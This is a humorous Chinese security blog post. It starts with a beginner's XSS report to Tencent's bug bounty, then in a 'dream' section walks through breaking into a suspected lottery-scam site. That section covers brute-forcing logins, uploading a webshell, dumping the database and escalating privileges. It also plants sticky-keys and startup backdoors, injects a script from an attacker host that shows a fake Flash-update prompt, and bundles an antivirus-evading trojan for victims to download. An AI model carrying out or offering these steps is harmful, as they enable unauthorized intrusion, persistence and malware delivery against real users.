月餅計劃之XSS

注：本文首發地址：https://www.sec-in.com
文章作者為-句芒安全實驗室-成員之一，歡迎微信搜索關注我們。

計劃制定

2020年9月的某一天，天朗氣清，惠風和暢。我默默打開日歷，打算看下今日運勢，宜劃水、聊天、睡覺。與我努力奮斗積極向上的性格不合。正在我沉思之時，突然收到一條消息：中秋來臨，各大SRC送月餅了！還有一張一積分換月餅的截圖。
SRC？中秋？月餅？送？本著字少事大不懂就查的我敏銳從中嗅到了不一樣的味道。
雖然我還是一個迷倒萬千少女的18歲的翩翩少年，且此前從未挖掘過漏洞，但是這并不影響我靈活的思路

以及我縝密的計劃：
1.了解什么是SRC
2.找一個漏洞提交
3.拿到月餅
于是自強自立我果斷百度SRC，原來是機器學習！

接下來就是再找個漏洞，憑借我踏實的基礎，我想到一個絕妙的payload沒錯！

<script>alert(1)</script>

萬事具備，就差一個網站了！美滋滋呀！百度國內知名src，然后隨便挑一個吧！看看哪一個呢？那就先騰訊的吧，畢竟作為一個百星榮耀王者選手，騰訊的面子還是要給的！先嫖它家月餅！

計劃實施

1.打開鏈接，嗯？怎么就直接彈出調查問卷？好我填我填就是了。

點擊馬上填寫，跳轉到一個域名https://wj.qq.com/
我填呀填，填呀填，越填越氣，你讓我填我就填，我不要面子了？然后我惡向膽邊生，看我xss！

<script>alert(1)</script>

2.出來吧！

然后我關掉頁面再次打開，提示內容已保存可繼續填寫，點擊繼續填寫到插入payload頁面依舊保存出現彈框，難道月餅有了？啊？這…不會吧？不會吧？當然不會了!

咳咳，畢竟是第一次提交，有點著急，不過問題不大，因為上面我第二次重新填寫的時候仍舊觸發，憑借我豐富的經驗，我覺得這是一個存儲型
XSS，為了月餅，沖沖沖！
為了驗證猜想，我登錄騰訊問卷，點擊創建問卷，由于觸發點為用戶輸入的其他內容處，針對此觸發點進行問卷創建。

創建完成后點擊開始回收，復制鏈接即可進行問卷的填寫。

完成后進入后臺點擊我的問卷-回收數據，可以看到用戶提交的內容，如下圖，可以看到用戶的payload，竟然沒有觸發，啊哈？

正當點擊編輯按鈕查看用戶輸入的內容，并且準備大展身手查看是否被轉義的時候，嗯哼，觸發了…

此刻帥氣迷人的我

然后，我果斷提交坐等積分，并且積極的幫助工作人員解決問題。

最后，獲得了積分2個。

當我興沖沖的出發的時候！月餅月餅月餅！竟然沒有月餅！
為什么是把傘?我懂了。

后來我知道了，原來是1積分換的是狗子。此時我不禁想到上面問卷調查測試的時候我最喜歡的動物寫的是狗，原來冥冥之中自有安排。

不過我絲毫不慌，因為我還有planB！

planB

經過上次的磨練現在我已經成長為一個經驗豐富的SRC挖掘工，精通挖掘各種XSS漏洞，下面我將對狗子下手！顫抖吧！狗子！思路同上！經過漫長等待積分到手!雖然只有兩個！

但是？？？

抱歉月餅！來晚了！

planC

經歷了2次失敗的我萬念俱灰，只想大睡一場，我覺得月餅在夢里，于是我去睡覺了。

繁星點點的夜空之下，天臺之上。兩個身影。
“貨帶了嗎？”
“箱子里，給我個機會，現在我想做個好人。”
“砰！”一聲槍響，一道黑影倒下。
“為什么？”

五百平別墅的大廳的沙發上我正在吃烤魚。
“老大，這是線人提供的對方內部APP，上面要求這次一網打盡！”
“知道了。”
沒錯，現在的我是個精通逆向流量分析、手工注入、釣魚、內網滲透、手握0day口算md5的滲透大佬。
我接過小弟送過來的iphone12，熟練的掛上代理，打開BP，添加證書，啟動APP，沒有數據包。問題不大，不過是雙向認證罷了，看我采用突破SLL-Pinning的經典操作：Xposed+justTrustme模塊。
原理：將各種已知的的HTTP請求庫中用于校驗證書的API都進行Hook，使無論是否是可信證書的情況，校驗結果返回都為正常狀態，從而實現繞過證書檢查的效果。
步驟:先這樣這樣，在這樣這樣就可以了。

成果：通過分析找到后臺登錄地址。

默默的給自己泡了杯云南金瓜貢茶，開始搞它。
1.常用弱口令字典一波梭哈，無果，問題不大祭出社工字典,這里使用cupp。

git clone https://github.com/Mebus/cupp.git

python3 cupp.py -i #進入交互模式按需要輸入即可

驗證碼使用bp插件captcha-killer
github項目地址：https://github.com/c0ny1/captcha-killer/releases
步驟:
1.找到文字識別

2.創建應用

3.創建完成查看應用會看到生成的key

參考：https://ai.baidu.com/ai-doc/REFERENCE/Ck3dwjhhu
4.bp加載插件，獲取數據包，發送

插件詳細方法使用參考：https://gv7.me/articles/2019/burp-captcha-killer-usage/
5.最后爆破成功得到一個后臺賬號，登錄后臺

6.簡單看下功能，發現一處頭像上傳

嘗試上傳圖片，獲取數據包后更改后綴進行繞過，上傳成功后訪問無法解析，重新嘗試，更改圖中綠框中位置及文件名，上傳成功。

訪問該文件，可解析

使用蟻劍連接，執行whoami查看權限，為IIS權限，至此獲取網站權限。

7.開始第二階段，獲取目標數據。
測試可對當前目錄進行讀寫，查看服務器開放端口，開放3389端口，采用最簡單直接方法，翻找配置文件，一般配置文件命名在網站目錄下且一般命名帶有config字樣，一番猛虎操作，找到配置文件得到數據庫賬號密碼

8.上傳mysqldump.exe執行命令

mysqldump -uroot -p密碼 --all-databases > D:/wwwroot/xxx.net/xxx/dump.zip

完成后訪問該URL下載zip格式文件更該后綴為.sql還原數據庫即可
9.開始分析數據庫內容。
打開navicat連接本地mysql數據庫，選擇運行sql文件

導入之前下載的數據庫，點擊開始

完成之后
？？？

照顧一下密集恐懼者吧[手動難受]，開始漫長的體力勞動，一個個庫一個個表的翻看

最后經過一瓶無糖雪碧椰子水汽水的漫長時間，梳理出代理賬號N條，抽獎者用戶記錄N+1條。資金流水0毛。可具備堅韌不拔氣質的我豈能認輸？
又經過努力的體力勞動，發現且部分推廣內容為微信抽獎，且存在有wxopenid


解密部分代理賬號登錄查看發現代理用戶可自定義獎品并生成網頁鏈接及二維碼，且每個代理有自己的抽獎二維碼，是否中獎都可后臺進行設置，也就是說我讓你中你就中讓你不中就不中，之后訪問該鏈接可以進行抽獎，但須要輸入抽獎碼才可進行抽取

之后抽獎完成后基本都是中獎，下面有個兌獎的二維碼，掃描二維碼后進行付款的操作。

至此，我決定總結推理一下：
管理員賬號可以添加代理賬號；
代理賬號可以自定義抽獎的獎品，可以自己生成抽獎碼，每個代理有自己的抽獎二維碼；
掃描抽獎二維碼進入自定義的抽獎頁面，需要輸入姓名和抽獎碼，抽獎完成后基本都是中獎，之后出現兌獎二維碼，掃描二維碼跳轉進行付款。
由于其數據庫中部分提示信息和wxopenid字段可以推測其推廣主要是通過微信，包括關注公眾號抽獎、拉好友加微信獲取抽獎資格等方式。
由于數據庫中并未涉及金額等重要數據，聯系搜集的線索猜測其變現方式：拋出無空獎或高獎品進行誘惑，之后可能給受害者甜頭讓其拉人頭獲取受眾，之后出售兌獎號碼獲利。

10.根據數據庫及以上線索，基本推測出目標的作案手法，下面開始看看服務器上還有沒有其他線索，根據獲取的shell可以確認服務器擁有兩個磁盤，C盤，D盤，網站放在D盤中，有讀寫權限，C盤僅部分目錄可以訪問，且只有讀權限無寫權限。
嘗試提權。先使用了幾個通用EXP，未果，mysql提權，未果。
cmd下執行systeminfo命令導出文件下載至本地，之后使用windows-exploit-suggester.py進行查找嘗試提權，

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-3E9eMbDN-1617346162928)(https://gitee.com/lyxy-all/img-mweb/raw/master/20201120104758.jpg)]
嘗試一遍后，全部沒成功。

沒關系，只見我修長潔白的雙指靈活的敲擊著鍵盤打出了tasklist

當我看到了fileZilla Server.exe以及dog之時

我知道，問題不大，又到了我的表演時刻
11.看我三方提權，根據iis權限翻看已有目錄，找到filezilla配置文件，但無該目錄文件編輯權限，可下載，存在多個賬戶，利用網上md5解密，得到其中一個賬號密碼。

為保持版本一致，下載該目錄下的所有文件，由于filezilla分為前端連接及后端管理，后端為本地訪問默認端口14147


由于之前多次提權時還使用過msf，利用msf反彈shell添加代理，shell中執行命令portfwd add -l 14147 -p 14147 -r 127.0.0.1 將本地14147端口轉發到公網14147端口，使用下載好的客戶端連接公網端口14147

設置C盤共享


獲取C盤訪問控制權

之后可利用shift后門遠程連接3389獲取system權限（將C:\windows\system32\sethc.exe替換為cmd.exe之后遠程5次粘貼鍵彈出cmd命令窗口）或啟動項
(位置：
/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/后門文件）反彈shell再或者利用mof提權。

12.權限做好后我又翻呀翻，啥也沒翻到。

既然服務器、數據庫都翻了，下面該接著搞人了，可這服務器看了下八輩子沒人上，怎么辦？那當然是我的xss了！

<script>alert(1)</script>

反正有了服務器的控制權，看數據庫登錄記錄有有不少代理比較活躍，另外，由于這個網站比較好搞，猜測使用者安全意識不是太高。看能不能搞幾個代理的個人PC吧，為此，我決定在網站后臺登錄頁面插入xss釣魚。
13.使用github上的flash釣魚模板
https://github.com/r00tSe7en/Fake-flash.cn
下載完成后打開index.html文件，修改下載地址為木馬下載地址,例如地址為http://www.xxx.com/fash.exe

服務器上再新建一個js文件，寫入我們彈框的內容，并放到我們的服務器上，例如放到http://www.xxx.com/xss.js

window.alert = function(name){var iframe = document. createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src",'data:text/plain,');document. documentElement.appendChild(iframe);window.frames [0].window.alert(name);iframe.parentNode.removeChild(iframe);}alert( "您的FLASH版本過低，嘗試升級后訪問該頁面! ");window. location.href="此處填入用戶點擊確定后跳轉的URL,如http://www.xxx.com/";

之后將xss代碼插入目標網頁中

<script src="http://www.xxx.com/xss.js"> </script>

當目標登錄后臺時彈出以下內容

點擊確定后會自動跳轉到我們制作好的釣魚頁面

點擊立即下載就會下載我們制作好的文件
14.準備工作：一臺服務器，一個相似域名，一個免殺馬。
服務器推薦https://my.vultr.com/
優點：用完即可銷毀，按小時計費，可備份快照，系統推薦安裝ubuntu

apt install apache2 #安裝一路y確定安裝 /etc/init.d/apache2 start #啟動服務

域名注冊可以使用免費域名網站，例如，https://my.freenom.com/
免殺馬，這里簡單講下思路，回頭有時間整理一份詳細的，可以使用一些開源項目，例如github上的掩日(可過部分殺軟)等，或者多語言互相轉換，php馬轉exe，再加上一層自解壓等
免殺馬制作好后為了更逼真，下載官方的文件利用自解壓進行捆綁
同時選中官方文件和木馬，創建自解壓文件

選擇高級-自解壓選項-更新-覆蓋所有文件

設置解壓路徑

設置提取后運行的文件

設置模式全部隱藏

點擊確定后生成文件

為了更具有迷惑性使用 ResourceHacker修改圖標，將文件拖入后選擇操作-替換圖標

選中正常的flash文件，點擊替換，并另存為保存，命名為官網相同文件名



雙擊運行效果圖

15.步驟完成后坐等上線，N久以后的某個凌晨魚兒上線。

16.一周后，又是一個天朗氣清的好日子。
“老大，上次任務完成后上面獎勵了1千萬!”
“哦，捐了吧。”
“啊？”
看著小弟驚訝的樣子，我不禁嘆了口氣，或許多年后他才能明白我的用意。
17.“起來了！起來了！都起來！上班時間到了！”我揉了揉眼睛張望四周，一臺巨大的黑色顯示屏，一個鍵盤，一盆綠蘿，原來剛才是個夢呀。“喂!說你呢，趕緊工作別亂看了！再睡扣錢！”
“收到！馬上工作！”，此時我不禁回味起夢里讓小弟捐錢的情景，是啊，有得必有失，得到金錢的同時必然會失去很多煩惱。

尾記：對了，聽說云眾投稿給發月餅，要不我把故事編一編，萬一把機智可愛帥氣善良漂亮美麗的審核大佬們忽悠過去了，我的月餅豈不是…

超強干貨來襲 云風專訪：近40年碼齡，通宵達旦的技術人生

總結

以上是生活随笔為你收集整理的月饼计划之XSS的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。